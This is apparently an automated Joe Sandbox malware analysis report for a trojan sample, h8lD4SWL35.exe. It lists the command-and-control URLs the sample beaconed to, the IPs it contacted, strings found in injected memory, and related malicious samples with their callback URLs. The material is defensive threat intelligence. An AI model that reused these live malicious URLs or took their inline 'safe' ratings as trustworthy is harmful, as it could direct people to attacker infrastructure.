                                                		unknowntrue
                                                  		unknown
                                                  www.ithacapella.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.profirma-nachfolge.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=UkBnU3nUIfYrxnxuiA7IQSHNtnWcHyh0bpM1KLOn6D8O+IO5Dhvu3uMtlrW7JTyKOcvitrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.alpinevalleytimeshares.com/nsag/?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt4true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    www.856380692.xyz/nsag/true
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.worldsourcecloud.com/nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.winabeel.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=Zdd+03lFPdaO8MwVGmYqRiw2DY9Wd51jzurMe9uohGYtv5+xzmK27QiPS7vk8ejd2SQPfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.meow-cafe.com/nsag/?AjU=IhldT5wJOWXugkoAiz0IGMqIRU2spNDmcqQlMhwJn5b9F51tDlQqNKQjjCxGsZbl2k8T&njndiL=9rtTFPBhfVt4true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mecs.club/nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.krishnagiri.info/nsag/?njndiL=9rtTFPBhfVt4&AjU=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lotrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dccheavydutydiv.net/nsag/?njndiL=9rtTFPBhfVt4&AjU=7cP8xnb8WyCvwLiClb+mYodtMUI7w/zEY/AqgyK4ue3XLBeWVzU6LHeJbcAyXLM59Zs/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.icepolo.com/nsag/?njndiL=9rtTFPBhfVt4&AjU=KrISVuELCs1q3UlzX6dLs0GN1f73ulMhv38PeKk8K2lo4f0Q4j/pm/FXRZPdylmCs2jxtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.11376.xyz/nsag/?AjU=WEYxfFr10ymru5OxaDoG/Amdd7m3iDRjniOpUd0nZrfzDh8VapTmqk6sbIliE5dwTmsdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorErrorh8lD4SWL35.exefalse
                                                                  		high
                                                                  http://www.goodfont.co.krexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.carterandcone.comlexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.typography.netDexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.11376.xyz/msdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://fontfabrik.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://nsis.sf.net/NSIS_Errorh8lD4SWL35.exefalse
                                                                        		high
                                                                        http://www.11376.xyz/cmsdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.fonts.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.sakkal.comexplorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            91.195.240.94
                                                                            		www.explorerthecity.comGermany
                                                                            		47846SEDO-ASDEtrue
                                                                            199.59.242.153
                                                                            		www.krishnagiri.infoUnited States
                                                                            		395082BODIS-NJUStrue
                                                                            213.32.49.255
                                                                            		www.meow-cafe.comFrance
                                                                            		16276OVHFRtrue
                                                                            172.67.223.7
                                                                            		www.worldsourcecloud.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            217.160.0.69
                                                                            		www.profirma-nachfolge.comGermany
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            34.102.136.180
                                                                            		xfixpros.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            64.190.62.111
                                                                            		www.icepolo.comUnited States
                                                                            		11696NBS11696UStrue
                                                                            155.133.132.7
                                                                            		webacc5.sd3.ghst.netFrance
                                                                            		203476GANDI-AS-2Domainnameregistrar-httpwwwgandinetFRtrue
                                                                            23.101.8.193
                                                                            		www.11376.xyzUnited States
                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                            188.164.131.200
                                                                            		parking.namesilo.comItaly
                                                                            		34971PDDA-ASITfalse

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:374845
                                                                            Start date:24.03.2021
                                                                            Start time:09:17:11
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 40s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Sample file name:h8lD4SWL35.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/1@17/10
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 26.3% (good quality ratio 24.2%)
                                                                            • Quality average: 74.4%
                                                                            • Quality standard deviation: 31.1%
                                                                            HCA Information:
                                                                            • Successful, ratio: 87%
                                                                            • Number of executed functions: 105
                                                                            • Number of non-executed functions: 70
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 13.64.90.137, 52.147.198.201, 95.100.54.203, 168.61.161.212
                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, skypedataprdcolwus17.cloudapp.net, cs9.wac.phicdn.net, fs.microsoft.com, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/374845/sample/h8lD4SWL35.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            No simulations

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            91.195.240.94triage_dropped_file.exeGet hashmaliciousBrowse
                                                                            • www.flatfootedhatting.com/mdi/?2dz=o8eDa&-Z5hP4=DioI88TeqQWmfiiOmWmcuaLincjPCeFxAm3Mf4GBdL3hzcnSr+FxxIMhUvAG057P6VV0
                                                                            OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                            • www.jonluxe.com/smzu/?sXUlfNy=4jmgUyxqrzKB9R6KY/Kw9NkpGfAQarlAiZC+A6ZDIzrul26D+9SSDQPuld862RkvQb+o&D8cH=9r8tQzN8o24l6vY
                                                                            32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                            • www.cyprusdivingcenters.com/4qdc/?AR-XJ2=GWRfbaKz01PX5Z24EW6v97NylbcBSP0I/uKVXfrPyRhssTOBPKVVwg/7wG9CsgnNb2uF&et-=XPJxZ2SpixNTl6pp
                                                                            purchase order#034.exeGet hashmaliciousBrowse
                                                                            • www.hidennys.com/8ufh/?EzrthRhp=sNj8Sec9GqI0+hqF3zDptdIKoFxwJ6eQMN5NjCYIrvdQEt76PH0isvXP3IEsdJcOyN5p&ojo0f=SzrhU8
                                                                            PS-AVP2-307678.xlsxGet hashmaliciousBrowse
                                                                            • www.explorerthecity.com/nsag/?FN=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&wDK0HL=OzrL
                                                                            #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exeGet hashmaliciousBrowse
                                                                            • www.hydrabadproperties.com/n7ak/
                                                                            packet426.exeGet hashmaliciousBrowse
                                                                            • thespiritualhealth.com/wp-content/themes/lightweight/img4.php?k=w20a68bys22rt
                                                                            ETD 4.2 INVOICE, PACKING LIST.xlsxGet hashmaliciousBrowse
                                                                            • www.explorerthecity.com/nsag/?drmti4xx=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&3fo=iJBh
                                                                            Invoice-0898764_pdf.exeGet hashmaliciousBrowse
                                                                            • www.eleriwyn.com/xgxp/?Cjp4a=ftxlnN6p&tXUt=KSW9RKoPc3Kh/CSV7AxGbGPbVlrTLMNWA5H4CU5GSt5Tcl+uSK1dERD9jfC+q3XvMFMA
                                                                            PO_210301.exe.exeGet hashmaliciousBrowse
                                                                            • www.homeownerdefenders.com/kbc/?T8Ud-te=4PX/28v1JVZVbcj+oKk1Amx2xgNaqYiJpFMQS6y6umMteFjOqTMFLhmTrBrbk6jmxMcJ&U48Ho=NtetPLUX-pOH6Vkp
                                                                            RAQ11986.exeGet hashmaliciousBrowse
                                                                            • www.homeownerdefenders.net/iae2/?uZntHjO=eOZAhbUf7hoWTLxHpQenGxn9ynY5QSqXsSeHMExh6aqc7Z+PeCtqk6zVweyDGmkWOS1c&U488k=Hvsdfr6HWtDxzF-
                                                                            DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                                            • www.wesharefiles.com/cna8/?EZA0IN=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+rCh490K/8&DzrLH=VBZHY83XQx6heP
                                                                            P.O-48452689535945.exeGet hashmaliciousBrowse
                                                                            • www.covicio.com/h3qo/?LL04=OddLokl31qshFyWlyQEIcVDu0pAizKjoKxsWslvKSNLFFj/yIE9+GRG/HaxRm8+xLwnE&-ZAtX2=rVIHh
                                                                            Parcel _009887 .exeGet hashmaliciousBrowse
                                                                            • www.travaze.net/csw6/?t8bHuZw=5Csme1iBHNLN+MMVXv0Y+/dYmOMAu5DDsb4nl1t7CK7OkDyEaEwdChfrrdS2Koinfw+E+sdbXw==&2d=llsp
                                                                            NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                                            • www.wesharefiles.com/cna8/?Iv4=XVs8FhyH&J6A8VhS0=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38
                                                                            RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXEGet hashmaliciousBrowse
                                                                            • www.wesharefiles.com/cna8/?BvI=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38&J690I=el8Pez2hlLm
                                                                            SK8HSWos1p.rtfGet hashmaliciousBrowse
                                                                            • www.prnttees.com/o8na/?6lhtznA=51OYCRjHpMN3HpclT1eaxLu+bDejj8XPwPDcg4oNcqWkkOhXz69T2J50gX1YIKk3eI3vVg==&rX=VzutZ2
                                                                            lrx2NdZ3mavijH3.exeGet hashmaliciousBrowse
                                                                            • www.teamservices4u.com/oge8/?LZQL=2Q1V0rFP0g35+JiUqKw8TcUqIyPBABTTiK88FWn/OoxVAjFntsBSyTugd8JoenjAbNuv&RlW=bloxst50sbtt30
                                                                            SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                                                            • www.alfijah.com/cdl/?Mfg=G+hnbh0fhMo9rw67x4wB5l/o6fgJW5PS78dKEpg5mIySa4Eqi+9VZXBKCfZnt2P28vS2&uVxpj=ojO0dJYX1B
                                                                            PO71109.EXEGet hashmaliciousBrowse
                                                                            • www.homeownerdefenders.net/iae2/?kFQh7b=ffh4_6HH-&PtYX_bD=eOZAhbUf7hoWTLxHpQenGxn9ynY5QSqXsSeHMExh6aqc7Z+PeCtqk6zVwdS5W3EuU1Ub
                                                                            199.59.242.153Swift001.exeGet hashmaliciousBrowse
                                                                            • www.wwwrigalinks.com/gwam/?xVMtBLt0=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutliPhktBhW&1bw=Lhe8eJi8jXTPbflp
                                                                            payment proof.xlsxGet hashmaliciousBrowse
                                                                            • www.miraculous.life/m2be/?qZ=eQWDbOE18bwNn1c6hQyAhlOJpiLleLhghIYaW/NoSqhDJqre67/q+nvS3K2tAkeADmgYvQ==&-Zotn=_L08ytu
                                                                            IMG001.exeGet hashmaliciousBrowse
                                                                            • www.wwwrigalinks.com/gwam/?pPc=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Hp=V6ALd6rp
                                                                            SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                            • www.miraculous.life/m2be/?Et5pFP9=eQWDbOEw8cwJnlQ2jQyAhlOJpiLleLhghIAKK8RpWKhCJbHY9rumojXQ0s2rYFGIPQU52jmrVQ==&uDKLJ=D48t
                                                                            swift_43543.exeGet hashmaliciousBrowse
                                                                            • www.hicapitolize.com/m8es/?Fv=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725aQBevwIlT&2d=lnxh
                                                                            Shipping Documents.exeGet hashmaliciousBrowse
                                                                            • www.residentialwarantyservices.com/6axz/?xpU8Zp=Kkc6vMOoWWzjtSxxaOgSWkiBLEIdOxpM05SppQ3H6BcNP3eNXlk9qIjm479ChxLDO4+I&et-=XPJpA2ZHxx5p-46P
                                                                            DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                            • www.atualizacao.net/vsk9/?mJExfdk=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEWFaMvIwN53t&_jATiR=Zfg8Oj0hMNM
                                                                            quLdcfImUL.exeGet hashmaliciousBrowse
                                                                            • www.dashite.com/m0rc/?w2=e0H1wEhQwR8XenWZMT9Lk9dC12X2qD4bH92KrjbZtkK87UxEr24UrPBHxuQ9frqx02om&GXIxB=X6L0NnPPDBgd_nG0
                                                                            832rEedEl3.exeGet hashmaliciousBrowse
                                                                            • www.krishnagiri.info/nsag/?Dzut_N=3fm4&XrFHuD3X=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI0iZvYkV6Tiv
                                                                            winlog.exeGet hashmaliciousBrowse
                                                                            • www.swifter.tech/g832/?9rJxVx9H=lNaVPRHptQ0Ev22uLIEaxMN1HwfxRPntZTFq+eUeZa7iR5DoZezrmFqFVoeJekzBlFGm&Fzux=Wb1xZlcp7
                                                                            NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                            • www.swifter.tech/g832/?wDK0HL=OxoH&FN=lNaVPRHstX0Avm6iJIEaxMN1HwfxRPntZTd6idIfd67jRIvueOinwBSHWNy1FEHyqETWpg==
                                                                            new-order.exeGet hashmaliciousBrowse
                                                                            • www.enterpriseautfinance.com/aun3/?yrF=+zB0KtbC/PDZCvZdEyJOuj4f8ukQ+dIrMxZNI4+/XMl3jIiK6zjIKsFqz2dHd8z9l2SX&SN9=zjLHMPipzbg8rn
                                                                            xPUqa4qbDL.jsGet hashmaliciousBrowse
                                                                            • ww7.101legit.com/
                                                                            PO #6093245.exeGet hashmaliciousBrowse
                                                                            • www.columbiapatientsafety.com/b3pu/?kzrxUJ=Po+ooE/DTuM+SNsPvO9X33bQcBYkN9VVSpga1iLrEH685rCxHFclWjqsXp2fuCLu/+rZ&mBy=wZOTMdR8Z49L4
                                                                            1feiNnK6Qd.exeGet hashmaliciousBrowse
                                                                            • www.krishnagiri.info/nsag/?arX=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo&9rdX=bJEPUthHNB
                                                                            bXSINeHUUZ.dllGet hashmaliciousBrowse
                                                                            • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0527-3817-b78c-1499536b2816
                                                                            R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                                            • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0525-1690-a44f-893fe3fe808a
                                                                            KCCAfipQl2.dllGet hashmaliciousBrowse
                                                                            • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0523-4094-953a-a3979b22da2d
                                                                            Confirmaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                                            • www.upmchealhtrak.com/uidr/?tFQt=EJZKOT9ZCEKBmohuC2k9yF0p2trzw4QyidNomzMnQ/ct05beZhyUzb0V3MCAx6o5O4uT&CTp0=ctxDHzZH
                                                                            twistercrypted.exeGet hashmaliciousBrowse
                                                                            • www.checkmategmaing.com/e3rp/?j8pPk=WoT9kU8rqi/cGZL03oGYdUMw0kSwjDQq+YneiDuMSKhXxULaCpep70maN8hHS2zUupty&iJ=yL3dpJexppT

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            www.profirma-nachfolge.com1feiNnK6Qd.exeGet hashmaliciousBrowse
                                                                            • 217.160.0.69
                                                                            inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                            • 217.160.0.69
                                                                            parking.namesilo.comd3r3jm1oKY.exeGet hashmaliciousBrowse
                                                                            • 70.39.125.244
                                                                            9311-32400.pdf.exeGet hashmaliciousBrowse
                                                                            • 45.58.190.82
                                                                            Invoice ICO ZRT.xlsxGet hashmaliciousBrowse
                                                                            • 192.161.187.200
                                                                            RFQ MEDICAL EQUIPMENT_PDF.exeGet hashmaliciousBrowse
                                                                            • 209.141.38.71
                                                                            v708469737489630001.exeGet hashmaliciousBrowse
                                                                            • 192.161.187.200
                                                                            SPmG3TLdax.exeGet hashmaliciousBrowse
                                                                            • 204.188.203.155
                                                                            RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                            • 64.32.22.102
                                                                            0HCan2RjnP.exeGet hashmaliciousBrowse
                                                                            • 107.161.23.204
                                                                            1feiNnK6Qd.exeGet hashmaliciousBrowse
                                                                            • 209.141.38.71
                                                                            Yc6FOuQigh.exeGet hashmaliciousBrowse
                                                                            • 198.251.84.92
                                                                            quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                            • 209.141.38.71
                                                                            HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                            • 198.251.84.92
                                                                            SHED.EXEGet hashmaliciousBrowse
                                                                            • 168.235.88.209
                                                                            2021_02_18.exeGet hashmaliciousBrowse
                                                                            • 192.161.187.200
                                                                            documents_0084568546754.exeGet hashmaliciousBrowse
                                                                            • 204.188.203.155
                                                                            MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                            • 45.58.190.82
                                                                            SecuriteInfo.com.Trojan.PackedNET.507.15470.exeGet hashmaliciousBrowse
                                                                            • 198.251.84.92
                                                                            Arrival Notice.exeGet hashmaliciousBrowse
                                                                            • 188.164.131.200
                                                                            ucPCgX1NlH.exeGet hashmaliciousBrowse
                                                                            • 188.164.131.200
                                                                            New -PO January.xlsxGet hashmaliciousBrowse
                                                                            • 64.32.22.102
                                                                            www.explorerthecity.comrhNdCBtBEX.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            PS-AVP2-307678.xlsxGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            ETD 4.2 INVOICE, PACKING LIST.xlsxGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            Nz7NA3F7z7.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            BODIS-NJUSSwift001.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            payment proof.xlsxGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            IMG001.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            swift_43543.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            Shipping Documents.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            quLdcfImUL.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            832rEedEl3.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            USsJ0oRIYr.docxGet hashmaliciousBrowse
                                                                            • 199.59.242.150
                                                                            winlog.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            new-order.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            xPUqa4qbDL.jsGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            PO #6093245.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            1feiNnK6Qd.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            bXSINeHUUZ.dllGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            KCCAfipQl2.dllGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            Confirmaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                                            • 199.59.242.153
                                                                            SEDO-ASDEFIN4.docmGet hashmaliciousBrowse
                                                                            • 91.195.240.13
                                                                            FIN4.docmGet hashmaliciousBrowse
                                                                            • 91.195.240.13
                                                                            FIN4.docmGet hashmaliciousBrowse
                                                                            • 91.195.240.13
                                                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94
                                                                            quLdcfImUL.exeGet hashmaliciousBrowse
                                                                            • 91.195.241.137
                                                                            Swift.exeGet hashmaliciousBrowse
                                                                            • 91.195.241.137
                                                                            MT LIANG SHENG_Ningbo Notice.xlsxGet hashmaliciousBrowse
                                                                            • 91.195.241.137
                                                                            PALERMO PO4215.xlsxGet hashmaliciousBrowse
                                                                            • 91.195.241.137
                                                                            NEW ORDER QUOTATION.xlsxGet hashmaliciousBrowse
                                                                            • 91.195.241.137
                                                                            Payment Copy.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.12
                                                                            purchase order#034.exeGet hashmaliciousBrowse
                                                                            • 91.195.240.94
